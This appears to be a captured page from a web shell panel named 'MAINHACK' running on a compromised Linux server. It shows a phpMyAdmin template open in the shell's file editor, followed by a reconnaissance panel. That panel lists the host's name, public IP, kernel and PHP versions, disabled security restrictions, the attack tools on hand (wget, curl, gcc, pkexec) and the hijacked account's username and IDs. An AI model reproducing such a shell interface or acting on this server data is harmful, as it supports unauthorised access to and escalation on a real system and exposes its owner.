[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: copy_form.twig
<form id="ajax_form" action="{{ url('/database/structure/copy-table') }}" method="post"> {{ get_hidden_inputs(url_params) }} <fieldset class="pma-fieldset"> <strong><label for="db_name_dropdown">{% trans 'Database:' %}</label></strong> <select id="db_name_dropdown" name="target_db"> {% for each_db in options %} <option value="{{ each_db.name }}"{{ each_db.is_selected ? ' selected' }}>{{ each_db.name }}</option> {% endfor %} </select> <br><br> <strong><label>{% trans 'Options:' %}</label></strong> <br> <input type="radio" id="what_structure" value="structure" name="what"> <label for="what_structure">{% trans 'Structure only' %}</label> <br> <input type="radio" id="what_data" value="data" name="what" checked> <label for="what_data">{% trans 'Structure and data' %}</label> <br> <input type="radio" id="what_dataonly" value="dataonly" name="what"> <label for="what_dataonly">{% trans 'Data only' %}</label> <br><br> <input type="checkbox" id="checkbox_drop" value="true" name="drop_if_exists"> <label for="checkbox_drop">{% trans 'Add DROP TABLE' %}</label> <br> <input type="checkbox" id="checkbox_auto_increment_cp" value="1" name="sql_auto_increment"> <label for="checkbox_auto_increment_cp">{% trans 'Add AUTO INCREMENT value' %}</label> <br> <input type="checkbox" id="checkbox_constraints" value="1" name="sql_auto_increment" checked> <label for="checkbox_constraints">{% trans 'Add constraints' %}</label> <br><br> <input type="checkbox" name="adjust_privileges" value="1" id="checkbox_adjust_privileges" checked> <label for="checkbox_adjust_privileges"> {% trans 'Adjust privileges' %} {{ show_docu('faq', 'faq6-39') }} </label> </fieldset> </form>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.92 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002